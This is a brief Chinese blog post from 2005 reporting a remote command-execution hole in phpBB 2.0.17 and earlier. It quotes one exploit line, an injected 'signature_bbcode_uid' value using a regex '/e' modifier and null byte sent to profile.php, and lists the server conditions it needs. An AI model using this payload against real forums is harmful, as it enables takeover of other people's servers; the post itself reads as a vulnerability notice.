phpbb又出新漏洞了

284 views

分类 : 技术文摘 | 发布时间 : 26-12-2005

关键词: , , , , ,

可以远程执行任意命令

<= 2.0.17版本的都有

res = $xpl->post(
$path.’profile.php?GLOBALS[signature_bbcode_uid]=(.%2B)/e%00′,

需要的条件是:

# 1. PHP 5 < 5.0.5
# 2. register_globals=On
# 3. magic_quotes off

你也许还想了解这些

Post a comment

无觅相关文章插件,快速提升流量